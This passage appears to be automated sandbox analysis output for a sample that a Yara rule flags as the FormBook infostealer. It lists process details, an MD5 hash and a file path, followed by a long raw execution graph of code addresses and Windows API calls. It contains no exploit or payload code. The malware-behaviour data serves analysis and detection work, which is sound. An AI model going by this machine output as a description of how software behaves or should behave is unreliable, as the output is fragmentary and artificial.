                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe"
                                                      Imagebase:0xcc0000
                                                      File size:140'800 bytes
                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3504903691.00000000058A0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                      Reputation:high
                                                      Has exited:false

                                                      Target ID:8
                                                      Start time:00:54:12
                                                      Start date:03/12/2024
                                                      Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                      Imagebase:0x7ff6bf500000
                                                      File size:676'768 bytes
                                                      MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                        Execution Graph

                                                        Execution Coverage:3.5%
                                                        Dynamic/Decrypted Code Coverage:0.4%
                                                        Signature Coverage:10.2%
                                                        Total number of Nodes:2000
                                                        Total number of Limit Nodes:151
100743->100746 100819 829e4a 89 API calls 4 library calls 100745->100819 100746->100725 100746->100726 100746->100728 100746->100733 100746->100736 100746->100737 100746->100739 100746->100741 100746->100742 100746->100743 100747 7ca55a 100746->100747 100773 7cc8c0 331 API calls 2 library calls 100746->100773 100774 7cb900 60 API calls Mailbox 100746->100774 100817 829e4a 89 API calls 4 library calls 100747->100817 100748->100722 100748->100739 100748->100740 100748->100746 100751 7cb2b6 100748->100751 100754 80086a 100748->100754 100756 800878 100748->100756 100758 80085c 100748->100758 100759 7cb21c 100748->100759 100763 7cb525 100748->100763 100764 816e8f 59 API calls 100748->100764 100767 83df23 100748->100767 100770 83df37 100748->100770 100775 7c9ea0 100748->100775 100799 7c9c90 59 API calls Mailbox 100748->100799 100803 83c193 85 API calls 2 library calls 100748->100803 100804 83c2e0 96 API calls Mailbox 100748->100804 100805 827956 59 API calls Mailbox 100748->100805 100806 83bc6b 331 API calls Mailbox 100748->100806 100807 81617e 59 API calls Mailbox 100748->100807 100802 7cf6a3 331 API calls 100751->100802 100815 7c9c90 59 API calls Mailbox 100754->100815 100816 829e4a 89 API calls 4 library calls 100756->100816 100758->100739 100814 81617e 59 API calls Mailbox 100758->100814 100800 7c9d3c 60 API calls Mailbox 100759->100800 100761 7cb22d 100801 7c9d3c 60 API calls Mailbox 100761->100801 100813 829e4a 89 API calls 4 library calls 100763->100813 100764->100748 100820 83cadd 100767->100820 100769 83df33 100769->100748 100771 83cadd 130 API calls 100770->100771 100772 83df47 100771->100772 100772->100748 100773->100746 100774->100746 100776 7c9ebf 100775->100776 100795 7c9eed Mailbox 100775->100795 100777 7e0db6 Mailbox 59 API calls 100776->100777 100777->100795 100778 7cb475 100779 7c8047 59 API calls 100778->100779 100792 7ca057 100779->100792 100780 7cb47a 100781 800055 100780->100781 100798 8009e5 100780->100798 100967 829e4a 89 API calls 4 library calls 
100781->100967 100785 7e0db6 59 API calls Mailbox 100785->100795 100786 800064 100786->100748 100788 7c7667 59 API calls 100788->100795 100789 7c8047 59 API calls 100789->100795 100791 7e2d40 67 API calls __cinit 100791->100795 100792->100748 100793 816e8f 59 API calls 100793->100795 100794 8009d6 100969 829e4a 89 API calls 4 library calls 100794->100969 100795->100778 100795->100780 100795->100781 100795->100785 100795->100788 100795->100789 100795->100791 100795->100792 100795->100793 100795->100794 100797 7ca55a 100795->100797 100965 7cc8c0 331 API calls 2 library calls 100795->100965 100966 7cb900 60 API calls Mailbox 100795->100966 100968 829e4a 89 API calls 4 library calls 100797->100968 100970 829e4a 89 API calls 4 library calls 100798->100970 100799->100748 100800->100761 100801->100751 100802->100763 100803->100748 100804->100748 100805->100748 100806->100748 100807->100748 100808->100731 100810 7c805a 100809->100810 100811 7c8052 100809->100811 100810->100739 100971 7c7f77 59 API calls 2 library calls 100811->100971 100813->100758 100814->100739 100815->100758 100816->100758 100817->100739 100818->100745 100819->100739 100858 7c9837 100820->100858 100824 83cdb9 100825 83cf2e 100824->100825 100829 83cdc7 100824->100829 100926 83d8c8 92 API calls Mailbox 100825->100926 100828 83cf3d 100828->100829 100830 83cf49 100828->100830 100889 83c96e 100829->100889 100846 83cb61 Mailbox 100830->100846 100831 7c9837 84 API calls 100841 83cbb2 Mailbox 100831->100841 100836 83ce00 100904 7e0c08 100836->100904 100839 83ce33 100911 7c92ce 100839->100911 100840 83ce1a 100910 829e4a 89 API calls 4 library calls 100840->100910 100841->100824 100841->100831 100841->100846 100908 83fbce 59 API calls 2 library calls 100841->100908 100909 83cfdf 61 API calls 2 library calls 100841->100909 100844 83ce25 GetCurrentProcess TerminateProcess 100844->100839 100846->100769 100850 83cfa4 100850->100846 100853 83cfb8 FreeLibrary 100850->100853 100851 83ce6b 100923 83d649 107 API calls 
_free 100851->100923 100853->100846 100857 83ce7c 100857->100850 100924 7c8d40 59 API calls Mailbox 100857->100924 100925 7c9d3c 60 API calls Mailbox 100857->100925 100927 83d649 107 API calls _free 100857->100927 100859 7c984b 100858->100859 100860 7c9851 100858->100860 100859->100846 100876 83d7a5 100859->100876 100861 7ff5d3 __i64tow 100860->100861 100862 7c9899 100860->100862 100864 7c9857 __itow 100860->100864 100868 7ff4da 100860->100868 100928 7e3698 83 API calls 3 library calls 100862->100928 100866 7e0db6 Mailbox 59 API calls 100864->100866 100869 7c9871 100866->100869 100867 7ff552 Mailbox _wcscpy 100929 7e3698 83 API calls 3 library calls 100867->100929 100868->100867 100870 7e0db6 Mailbox 59 API calls 100868->100870 100869->100859 100871 7c7de1 59 API calls 100869->100871 100873 7ff51f 100870->100873 100871->100859 100872 7e0db6 Mailbox 59 API calls 100874 7ff545 100872->100874 100873->100872 100874->100867 100875 7c7de1 59 API calls 100874->100875 100875->100867 100877 7c7e4f 59 API calls 100876->100877 100878 83d7c0 CharLowerBuffW 100877->100878 100930 81f167 100878->100930 100882 7c7667 59 API calls 100883 83d7f9 100882->100883 100937 7c784b 100883->100937 100885 83d810 100887 7c7d2c 59 API calls 100885->100887 100886 83d858 Mailbox 100886->100841 100888 83d81c Mailbox 100887->100888 100888->100886 100950 83cfdf 61 API calls 2 library calls 100888->100950 100890 83c989 100889->100890 100894 83c9de 100889->100894 100891 7e0db6 Mailbox 59 API calls 100890->100891 100893 83c9ab 100891->100893 100892 7e0db6 Mailbox 59 API calls 100892->100893 100893->100892 100893->100894 100895 83da50 100894->100895 100896 83dc79 Mailbox 100895->100896 100903 83da73 _strcat _wcscpy __wsetenvp 100895->100903 100896->100836 100897 7c9b98 59 API calls 100897->100903 100898 7c9b3c 59 API calls 100898->100903 100899 7c9be6 59 API calls 100899->100903 100900 7c9837 84 API calls 100900->100903 100901 7e571c 58 API calls __crtLCMapStringA_stat 100901->100903 100903->100896 
100903->100897 100903->100898 100903->100899 100903->100900 100903->100901 100954 825887 61 API calls 2 library calls 100903->100954 100905 7e0c1d 100904->100905 100906 7e0cb5 VirtualProtect 100905->100906 100907 7e0c83 100905->100907 100906->100907 100907->100839 100907->100840 100908->100841 100909->100841 100910->100844 100912 7c92d6 100911->100912 100913 7e0db6 Mailbox 59 API calls 100912->100913 100914 7c92e4 100913->100914 100915 7c92f0 100914->100915 100955 7c91fc 59 API calls Mailbox 100914->100955 100917 7c9050 100915->100917 100956 7c9160 100917->100956 100919 7e0db6 Mailbox 59 API calls 100921 7c90fb 100919->100921 100920 7c905f 100920->100919 100920->100921 100921->100857 100922 7c8d40 59 API calls Mailbox 100921->100922 100922->100851 100923->100857 100924->100857 100925->100857 100926->100828 100927->100857 100928->100864 100929->100861 100932 81f192 __wsetenvp 100930->100932 100931 81f1d1 100931->100882 100931->100888 100932->100931 100933 81f1c7 100932->100933 100934 81f278 100932->100934 100933->100931 100951 7c78c4 61 API calls 100933->100951 100934->100931 100952 7c78c4 61 API calls 100934->100952 100938 7c785a 100937->100938 100939 7c78b7 100937->100939 100938->100939 100941 7c7865 100938->100941 100940 7c7d2c 59 API calls 100939->100940 100947 7c7888 _memmove 100940->100947 100942 7feb09 100941->100942 100943 7c7880 100941->100943 100944 7c8029 59 API calls 100942->100944 100953 7c7f27 59 API calls Mailbox 100943->100953 100946 7feb13 100944->100946 100948 7e0db6 Mailbox 59 API calls 100946->100948 100947->100885 100949 7feb33 100948->100949 100950->100886 100951->100933 100952->100934 100953->100947 100954->100903 100955->100915 100957 7c9169 Mailbox 100956->100957 100958 7ff19f 100957->100958 100963 7c9173 100957->100963 100959 7e0db6 Mailbox 59 API calls 100958->100959 100961 7ff1ab 100959->100961 100960 7c917a 100960->100920 100963->100960 100964 7c9c90 59 API calls Mailbox 100963->100964 100964->100963 100965->100795 100966->100795 
100967->100786 100968->100792 100969->100798 100970->100792 100971->100810 100972 7e7c56 100973 7e7c62 type_info::_Type_info_dtor 100972->100973 101009 7e9e08 GetStartupInfoW 100973->101009 100975 7e7c67 101011 7e8b7c GetProcessHeap 100975->101011 100977 7e7cbf 100978 7e7cca 100977->100978 101094 7e7da6 58 API calls 3 library calls 100977->101094 101012 7e9ae6 100978->101012 100981 7e7cd0 100982 7e7cdb __RTC_Initialize 100981->100982 101095 7e7da6 58 API calls 3 library calls 100981->101095 101033 7ed5d2 100982->101033 100985 7e7cea 100986 7e7cf6 GetCommandLineW 100985->100986 101096 7e7da6 58 API calls 3 library calls 100985->101096 101052 7f4f23 GetEnvironmentStringsW 100986->101052 100989 7e7cf5 100989->100986 100992 7e7d10 100993 7e7d1b 100992->100993 101097 7e30b5 58 API calls 3 library calls 100992->101097 101062 7f4d58 100993->101062 100996 7e7d21 100997 7e7d2c 100996->100997 101098 7e30b5 58 API calls 3 library calls 100996->101098 101076 7e30ef 100997->101076 101000 7e7d34 101001 7e7d3f __wwincmdln 101000->101001 101099 7e30b5 58 API calls 3 library calls 101000->101099 101082 7c47d0 101001->101082 101004 7e7d53 101005 7e7d62 101004->101005 101100 7e3358 58 API calls _doexit 101004->101100 101101 7e30e0 58 API calls _doexit 101005->101101 101008 7e7d67 type_info::_Type_info_dtor 101010 7e9e1e 101009->101010 101010->100975 101011->100977 101102 7e3187 36 API calls 2 library calls 101012->101102 101014 7e9aeb 101103 7e9d3c InitializeCriticalSectionAndSpinCount __getstream 101014->101103 101016 7e9af0 101017 7e9af4 101016->101017 101105 7e9d8a TlsAlloc 101016->101105 101104 7e9b5c 61 API calls 2 library calls 101017->101104 101020 7e9b06 101020->101017 101022 7e9b11 101020->101022 101021 7e9af9 101021->100981 101106 7e87d5 101022->101106 101025 7e9b53 101114 7e9b5c 61 API calls 2 library calls 101025->101114 101028 7e9b32 101028->101025 101030 7e9b38 101028->101030 101029 7e9b58 101029->100981 101113 7e9a33 58 API calls 4 library calls 101030->101113 101032 
7e9b40 GetCurrentThreadId 101032->100981 101034 7ed5de type_info::_Type_info_dtor 101033->101034 101035 7e9c0b __lock 58 API calls 101034->101035 101036 7ed5e5 101035->101036 101037 7e87d5 __calloc_crt 58 API calls 101036->101037 101038 7ed5f6 101037->101038 101039 7ed661 GetStartupInfoW 101038->101039 101040 7ed601 type_info::_Type_info_dtor @_EH4_CallFilterFunc@8 101038->101040 101046 7ed676 101039->101046 101049 7ed7a5 101039->101049 101040->100985 101041 7ed86d 101128 7ed87d LeaveCriticalSection _doexit 101041->101128 101043 7e87d5 __calloc_crt 58 API calls 101043->101046 101044 7ed7f2 GetStdHandle 101044->101049 101045 7ed805 GetFileType 101045->101049 101046->101043 101048 7ed6c4 101046->101048 101046->101049 101047 7ed6f8 GetFileType 101047->101048 101048->101047 101048->101049 101126 7e9e2b InitializeCriticalSectionAndSpinCount 101048->101126 101049->101041 101049->101044 101049->101045 101127 7e9e2b InitializeCriticalSectionAndSpinCount 101049->101127 101053 7e7d06 101052->101053 101054 7f4f34 101052->101054 101058 7f4b1b GetModuleFileNameW 101053->101058 101129 7e881d 58 API calls 2 library calls 101054->101129 101056 7f4f5a _memmove 101057 7f4f70 FreeEnvironmentStringsW 101056->101057 101057->101053 101059 7f4b4f _wparse_cmdline 101058->101059 101061 7f4b8f _wparse_cmdline 101059->101061 101130 7e881d 58 API calls 2 library calls 101059->101130 101061->100992 101063 7f4d71 __wsetenvp 101062->101063 101067 7f4d69 101062->101067 101064 7e87d5 __calloc_crt 58 API calls 101063->101064 101072 7f4d9a __wsetenvp 101064->101072 101065 7f4df1 101066 7e2d55 _free 58 API calls 101065->101066 101066->101067 101067->100996 101068 7e87d5 __calloc_crt 58 API calls 101068->101072 101069 7f4e16 101071 7e2d55 _free 58 API calls 101069->101071 101071->101067 101072->101065 101072->101067 101072->101068 101072->101069 101073 7f4e2d 101072->101073 101131 7f4607 58 API calls __strnicmp_l 101072->101131 101132 7e8dc6 IsProcessorFeaturePresent 101073->101132 101075 7f4e39 
101075->100996 101079 7e30fb __IsNonwritableInCurrentImage 101076->101079 101078 7e3119 __initterm_e 101080 7e2d40 __cinit 67 API calls 101078->101080 101081 7e3138 _doexit __IsNonwritableInCurrentImage 101078->101081 101155 7ea4d1 101079->101155 101080->101081 101081->101000 101083 7c47ea 101082->101083 101093 7c4889 101082->101093 101084 7c4824 IsThemeActive 101083->101084 101158 7e336c 101084->101158 101088 7c4850 101170 7c48fd SystemParametersInfoW SystemParametersInfoW 101088->101170 101090 7c485c 101171 7c3b3a 101090->101171 101092 7c4864 SystemParametersInfoW 101092->101093 101093->101004 101094->100978 101095->100982 101096->100989 101100->101005 101101->101008 101102->101014 101103->101016 101104->101021 101105->101020 101109 7e87dc 101106->101109 101108 7e8817 101108->101025 101112 7e9de6 TlsSetValue 101108->101112 101109->101108 101111 7e87fa 101109->101111 101115 7f51f6 101109->101115 101111->101108 101111->101109 101123 7ea132 Sleep 101111->101123 101112->101028 101113->101032 101114->101029 101116 7f5201 101115->101116 101120 7f521c 101115->101120 101117 7f520d 101116->101117 101116->101120 101124 7e8b28 58 API calls __getptd_noexit 101117->101124 101119 7f522c RtlAllocateHeap 101119->101120 101121 7f5212 101119->101121 101120->101119 101120->101121 101125 7e33a1 DecodePointer 101120->101125 101121->101109 101123->101111 101124->101121 101125->101120 101126->101048 101127->101049 101128->101040 101129->101056 101130->101061 101131->101072 101133 7e8dd1 101132->101133 101138 7e8c59 101133->101138 101137 7e8dec 101137->101075 101139 7e8c73 _memset ___raise_securityfailure 101138->101139 101140 7e8c93 IsDebuggerPresent 101139->101140 101146 7ea155 SetUnhandledExceptionFilter UnhandledExceptionFilter 101140->101146 101142 7e8d57 ___raise_securityfailure 101147 7ec5f6 101142->101147 101144 7e8d7a 101145 7ea140 GetCurrentProcess TerminateProcess 101144->101145 101145->101137 101146->101142 101148 7ec5fe 101147->101148 101149 7ec600 IsProcessorFeaturePresent 
101147->101149 101148->101144 101151 7f590a 101149->101151 101154 7f58b9 5 API calls 2 library calls 101151->101154 101153 7f59ed 101153->101144 101154->101153 101156 7ea4d4 EncodePointer 101155->101156 101156->101156 101157 7ea4ee 101156->101157 101157->101078 101159 7e9c0b __lock 58 API calls 101158->101159 101160 7e3377 DecodePointer EncodePointer 101159->101160 101223 7e9d75 LeaveCriticalSection 101160->101223 101162 7c4849 101163 7e33d4 101162->101163 101164 7e33de 101163->101164 101165 7e33f8 101163->101165 101164->101165 101224 7e8b28 58 API calls __getptd_noexit 101164->101224 101165->101088 101167 7e33e8 101225 7e8db6 9 API calls __strnicmp_l 101167->101225 101169 7e33f3 101169->101088 101170->101090 101172 7c3b47 __ftell_nolock 101171->101172 101173 7c7667 59 API calls 101172->101173 101174 7c3b51 GetCurrentDirectoryW 101173->101174 101226 7c3766 101174->101226 101176 7c3b7a IsDebuggerPresent 101177 7c3b88 101176->101177 101178 7fd272 MessageBoxA 101176->101178 101179 7c3c61 101177->101179 101181 7fd28c 101177->101181 101182 7c3ba5 101177->101182 101178->101181 101180 7c3c68 SetCurrentDirectoryW 101179->101180 101183 7c3c75 Mailbox 101180->101183 101436 7c7213 59 API calls Mailbox 101181->101436 101307 7c7285 101182->101307 101183->101092 101186 7fd29c 101191 7fd2b2 SetCurrentDirectoryW 101186->101191 101188 7c3bc3 GetFullPathNameW 101189 7c7bcc 59 API calls 101188->101189 101190 7c3bfe 101189->101190 101323 7d092d 101190->101323 101191->101183 101194 7c3c1c 101195 7c3c26 101194->101195 101437 81874b AllocateAndInitializeSid CheckTokenMembership FreeSid 101194->101437 101339 7c3a46 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 101195->101339 101198 7fd2cf 101198->101195 101201 7fd2e0 101198->101201 101203 7c4706 61 API calls 101201->101203 101202 7c3c30 101204 7c3c43 101202->101204 101347 7c434a 101202->101347 101205 7fd2e8 101203->101205 101358 7d09d0 101204->101358 101208 7c7de1 59 API calls 101205->101208 101210 7fd2f5 101208->101210 
101209 7c3c4e 101209->101179 101435 7c443a Shell_NotifyIconW _memset 101209->101435 101211 7fd2ff 101210->101211 101212 7fd324 101210->101212 101214 7c7cab 59 API calls 101211->101214 101215 7c7cab 59 API calls 101212->101215 101217 7fd30a 101214->101217 101216 7fd320 GetForegroundWindow ShellExecuteW 101215->101216 101220 7fd354 Mailbox 101216->101220 101438 7c7b2e 101217->101438 101220->101179 101222 7c7cab 59 API calls 101222->101216 101223->101162 101224->101167 101225->101169 101227 7c7667 59 API calls 101226->101227 101228 7c377c 101227->101228 101447 7c3d31 101228->101447 101230 7c379a 101231 7c4706 61 API calls 101230->101231 101232 7c37ae 101231->101232 101233 7c7de1 59 API calls 101232->101233 101234 7c37bb 101233->101234 101461 7c4ddd 101234->101461 101237 7c37dc Mailbox 101242 7c8047 59 API calls 101237->101242 101238 7fd173 101517 82955b 101238->101517 101241 7fd192 101244 7e2d55 _free 58 API calls 101241->101244 101245 7c37ef 101242->101245 101246 7fd19f 101244->101246 101485 7c928a 101245->101485 101248 7c4e4a 84 API calls 101246->101248 101250 7fd1a8 101248->101250 101254 7c3ed0 59 API calls 101250->101254 101251 7c7de1 59 API calls 101252 7c3808 101251->101252 101488 7c84c0 101252->101488 101256 7fd1c3 101254->101256 101255 7c381a Mailbox 101257 7c7de1 59 API calls 101255->101257 101258 7c3ed0 59 API calls 101256->101258 101259 7c3840 101257->101259 101260 7fd1df 101258->101260 101261 7c84c0 69 API calls 101259->101261 101262 7c4706 61 API calls 101260->101262 101264 7c384f Mailbox 101261->101264 101263 7fd204 101262->101263 101265 7c3ed0 59 API calls 101263->101265 101267 7c7667 59 API calls 101264->101267 101266 7fd210 101265->101266 101268 7c8047 59 API calls 101266->101268 101269 7c386d 101267->101269 101270 7fd21e 101268->101270 101492 7c3ed0 101269->101492 101272 7c3ed0 59 API calls 101270->101272 101274 7fd22d 101272->101274 101280 7c8047 59 API calls 101274->101280 101276 7c3887 101276->101250 101277 7c3891 101276->101277 101278 7e2efd 
_W_store_winword 60 API calls 101277->101278 101279 7c389c 101278->101279 101279->101256 101281 7c38a6 101279->101281 101282 7fd24f 101280->101282 101283 7e2efd _W_store_winword 60 API calls 101281->101283 101284 7c3ed0 59 API calls 101282->101284 101285 7c38b1 101283->101285 101286 7fd25c 101284->101286 101285->101260 101287 7c38bb 101285->101287 101286->101286 101288 7e2efd _W_store_winword 60 API calls 101287->101288 101289 7c38c6 101288->101289 101289->101274 101290 7c3907 101289->101290 101292 7c3ed0 59 API calls 101289->101292 101290->101274 101291 7c3914 101290->101291 101293 7c92ce 59 API calls 101291->101293 101294 7c38ea 101292->101294 101295 7c3924 101293->101295 101296 7c8047 59 API calls 101294->101296 101297 7c9050 59 API calls 101295->101297 101298 7c38f8 101296->101298 101299 7c3932 101297->101299 101300 7c3ed0 59 API calls 101298->101300 101508 7c8ee0 101299->101508 101300->101290 101302 7c928a 59 API calls 101304 7c394f 101302->101304 101303 7c8ee0 60 API calls 101303->101304 101304->101302 101304->101303 101305 7c3ed0 59 API calls 101304->101305 101306 7c3995 Mailbox 101304->101306 101305->101304 101306->101176 101308 7c7292 __ftell_nolock 101307->101308 101309 7c72ab 101308->101309 101310 7fea22 _memset 101308->101310 101311 7c4750 60 API calls 101309->101311 101313 7fea3e GetOpenFileNameW 101310->101313 101312 7c72b4 101311->101312 102126 7e0791 101312->102126 101314 7fea8d 101313->101314 101316 7c7bcc 59 API calls 101314->101316 101318 7feaa2 101316->101318 101318->101318 101320 7c72c9 102144 7c686a 101320->102144 101324 7d093a __ftell_nolock 101323->101324 102381 7c6d80 101324->102381 101326 7d093f 101338 7c3c14 101326->101338 102392 7d119e 89 API calls 101326->102392 101328 7d094c 101328->101338 102393 7d3ee7 91 API calls Mailbox 101328->102393 101330 7d0955 101331 7d0959 GetFullPathNameW 101330->101331 101330->101338 101332 7c7bcc 59 API calls 101331->101332 101333 7d0985 101332->101333 101334 7c7bcc 59 API calls 101333->101334 101335 
7d0992 101334->101335 101336 804cab _wcscat 101335->101336 101337 7c7bcc 59 API calls 101335->101337 101337->101338 101338->101186 101338->101194 101340 7c3ab0 LoadImageW RegisterClassExW 101339->101340 101341 7fd261 101339->101341 102431 7c3041 7 API calls 101340->102431 102432 7c47a0 LoadImageW EnumResourceNamesW 101341->102432 101344 7c3b34 101346 7c39d5 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 101344->101346 101345 7fd26a 101346->101202 101348 7c4375 _memset 101347->101348 102433 7c4182 101348->102433 101351 7c43fa 101353 7c4414 Shell_NotifyIconW 101351->101353 101354 7c4430 Shell_NotifyIconW 101351->101354 101355 7c4422 101353->101355 101354->101355 102437 7c407c 101355->102437 101357 7c4429 101357->101204 101359 804cc3 101358->101359 101371 7d09f5 101358->101371 102595 829e4a 89 API calls 4 library calls 101359->102595 101361 7d0cfa 101361->101209 101364 7d0ee4 101364->101361 101366 7d0ef1 101364->101366 101365 7d0a4b PeekMessageW 101434 7d0a05 Mailbox 101365->101434 102593 7d1093 331 API calls Mailbox 101366->102593 101369 7d0ef8 LockWindowUpdate DestroyWindow GetMessageW 101369->101361 101373 7d0f2a 101369->101373 101370 7d0ce4 101370->101361 102592 7d1070 10 API calls Mailbox 101370->102592 101371->101434 102596 7c9e5d 60 API calls 101371->102596 102597 816349 331 API calls 101371->102597 101372 804e81 Sleep 101372->101434 101375 805c58 TranslateMessage DispatchMessageW GetMessageW 101373->101375 101375->101375 101376 805c88 101375->101376 101376->101361 101377 804d50 TranslateAcceleratorW 101380 7d0e43 PeekMessageW 101377->101380 101377->101434 101378 7c9e5d 60 API calls 101378->101434 101379 7d0ea5 TranslateMessage DispatchMessageW 101379->101380 101380->101434 101381 80581f WaitForSingleObject 101385 80583c GetExitCodeProcess CloseHandle 101381->101385 101381->101434 101383 7e0db6 59 API calls Mailbox 101383->101434 101384 7d0d13 timeGetTime 101384->101434 101417 7d0f95 101385->101417 101386 7d0e5f Sleep 101418 7d0e70 Mailbox 101386->101418 
101387 7c8047 59 API calls 101387->101434 101388 7c7667 59 API calls 101388->101418 101389 805af8 Sleep 101389->101418 101392 7e049f timeGetTime 101392->101418 101393 7d0f4e timeGetTime 102594 7c9e5d 60 API calls 101393->102594 101396 805b8f GetExitCodeProcess 101398 805ba5 WaitForSingleObject 101396->101398 101399 805bbb CloseHandle 101396->101399 101397 7c9837 84 API calls 101397->101434 101398->101399 101398->101434 101399->101418 101402 845f25 110 API calls 101402->101418 101403 7cb7dd 109 API calls 101403->101418 101404 805874 101404->101417 101405 805078 Sleep 101405->101434 101406 805c17 Sleep 101406->101434 101408 7c7de1 59 API calls 101408->101418 101417->101209 101418->101388 101418->101392 101418->101396 101418->101402 101418->101403 101418->101404 101418->101405 101418->101406 101418->101408 101418->101417 101418->101434 102604 822408 60 API calls 101418->102604 102605 7c9e5d 60 API calls 101418->102605 102606 7c89b3 69 API calls Mailbox 101418->102606 102607 7cb73c 331 API calls 101418->102607 102608 8164da 60 API calls 101418->102608 102609 825244 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 101418->102609 102610 823c55 66 API calls Mailbox 101418->102610 101419 829e4a 89 API calls 101419->101434 101421 7c84c0 69 API calls 101421->101434 101422 7c9c90 59 API calls Mailbox 101422->101434 101423 7c9ea0 304 API calls 101423->101434 101424 7cb73c 304 API calls 101424->101434 101426 81617e 59 API calls Mailbox 101426->101434 101427 7c89b3 69 API calls 101427->101434 101428 8055d5 VariantClear 101428->101434 101429 80566b VariantClear 101429->101434 101430 7c8cd4 59 API calls Mailbox 101430->101434 101431 805419 VariantClear 101431->101434 101432 816e8f 59 API calls 101432->101434 101433 7c7de1 59 API calls 101433->101434 101434->101365 101434->101370 101434->101372 101434->101377 101434->101378 101434->101379 101434->101380 101434->101381 101434->101383 101434->101384 101434->101386 101434->101387 101434->101389 
101434->101393 101434->101397 101434->101417 101434->101418 101434->101419 101434->101421 101434->101422 101434->101423 101434->101424 101434->101426 101434->101427 101434->101428 101434->101429 101434->101430 101434->101431 101434->101432 101434->101433 102460 7ce6a0 101434->102460 102491 7cf460 101434->102491 102510 7cfce0 101434->102510 102590 7ce420 331 API calls 101434->102590 102591 7c31ce IsDialogMessageW GetClassLongW 101434->102591 102598 846018 59 API calls 101434->102598 102599 829a15 59 API calls Mailbox 101434->102599 102600 81d4f2 59 API calls 101434->102600 102601 8160ef 59 API calls 2 library calls 101434->102601 102602 7c8401 59 API calls 101434->102602 102603 7c82df 59 API calls Mailbox 101434->102603 101435->101179 101436->101186 101437->101198 101439 7fec6b 101438->101439 101440 7c7b40 101438->101440 102921 817bdb 59 API calls _memmove 101439->102921 102915 7c7a51 101440->102915 101443 7c7b4c 101443->101222 101444 7fec75 101445 7c8047 59 API calls 101444->101445 101446 7fec7d Mailbox 101445->101446 101448 7c3d3e __ftell_nolock 101447->101448 101449 7c7bcc 59 API calls 101448->101449 101454 7c3ea4 Mailbox 101448->101454 101450 7c3d70 101449->101450 101457 7c3da6 Mailbox 101450->101457 101558 7c79f2 101450->101558 101452 7c3e77 101453 7c7de1 59 API calls 101452->101453 101452->101454 101456 7c3e98 101453->101456 101454->101230 101455 7c7de1 59 API calls 101455->101457 101458 7c3f74 59 API calls 101456->101458 101457->101452 101457->101454 101457->101455 101459 7c79f2 59 API calls 101457->101459 101460 7c3f74 59 API calls 101457->101460 101458->101454 101459->101457 101460->101457 101561 7c4bb5 101461->101561 101466 7c4e08 LoadLibraryExW 101571 7c4b6a 101466->101571 101467 7fd8e6 101468 7c4e4a 84 API calls 101467->101468 101470 7fd8ed 101468->101470 101473 7c4b6a 3 API calls 101470->101473 101475 7fd8f5 101473->101475 101474 7c4e2f 101474->101475 101476 7c4e3b 101474->101476 101597 7c4f0b 101475->101597 101477 7c4e4a 84 API calls 101476->101477 
101479 7c37d4 101477->101479 101479->101237 101479->101238 101482 7fd91c 101605 7c4ec7 101482->101605 101484 7fd929 101486 7e0db6 Mailbox 59 API calls 101485->101486 101487 7c37fb 101486->101487 101487->101251 101489 7c84cb 101488->101489 101491 7c84f2 101489->101491 101856 7c89b3 69 API calls Mailbox 101489->101856 101491->101255 101493 7c3eda 101492->101493 101494 7c3ef3 101492->101494 101495 7c8047 59 API calls 101493->101495 101496 7c7bcc 59 API calls 101494->101496 101497 7c3879 101495->101497 101496->101497 101498 7e2efd 101497->101498 101499 7e2f7e 101498->101499 101500 7e2f09 101498->101500 101859 7e2f90 60 API calls 3 library calls 101499->101859 101507 7e2f2e 101500->101507 101857 7e8b28 58 API calls __getptd_noexit 101500->101857 101503 7e2f8b 101503->101276 101504 7e2f15 101858 7e8db6 9 API calls __strnicmp_l 101504->101858 101506 7e2f20 101506->101276 101507->101276 101509 7ff17c 101508->101509 101514 7c8ef7 101508->101514 101509->101514 101861 7c8bdb 59 API calls Mailbox 101509->101861 101511 7c8fff 101511->101304 101512 7c8ff8 101515 7e0db6 Mailbox 59 API calls 101512->101515 101513 7c9040 101860 7c9d3c 60 API calls Mailbox 101513->101860 101514->101511 101514->101512 101514->101513 101515->101511 101518 7c4ee5 85 API calls 101517->101518 101519 8295ca 101518->101519 101862 829734 101519->101862 101522 7c4f0b 74 API calls 101523 8295f7 101522->101523 101524 7c4f0b 74 API calls 101523->101524 101525 829607 101524->101525 101526 7c4f0b 74 API calls 101525->101526 101527 829622 101526->101527 101528 7c4f0b 74 API calls 101527->101528 101529 82963d 101528->101529 101530 7c4ee5 85 API calls 101529->101530 101531 829654 101530->101531 101532 7e571c __crtLCMapStringA_stat 58 API calls 101531->101532 101533 82965b 101532->101533 101534 7e571c __crtLCMapStringA_stat 58 API calls 101533->101534 101535 829665 101534->101535 101536 7c4f0b 74 API calls 101535->101536 101537 829679 101536->101537 101538 829109 GetSystemTimeAsFileTime 101537->101538 101539 82968c 
[Execution graph fragment: node IDs, code addresses and edge list of the sample's call graph, with the Windows API calls reached along each path. APIs named in this fragment include LoadLibraryA, GetProcAddress, GetModuleHandleW, FreeLibrary, CreateStreamOnHGlobal, FindResourceExW, LoadResource, SizeofResource, LockResource, CreateFileW, GetFileType, GetLastError, CloseHandle, ReadFile, WriteFile, SetFilePointerEx, WriteConsoleW, GetConsoleMode, GetConsoleCP, WideCharToMultiByte, GetStringTypeW, CharUpperBuffW, SetCurrentDirectoryW, GetLongPathNameW, LoadStringW, Shell_NotifyIconW, DestroyIcon, GetSystemTimeAsFileTime, InitializeCriticalSectionAndSpinCount, EnterCriticalSection and LeaveCriticalSection, alongside C runtime internals (_free, _memmove, __getptd_noexit, __lock_file, __wsopen_helper, __write, __close_nolock). The raw node-to-node edge data is omitted.]
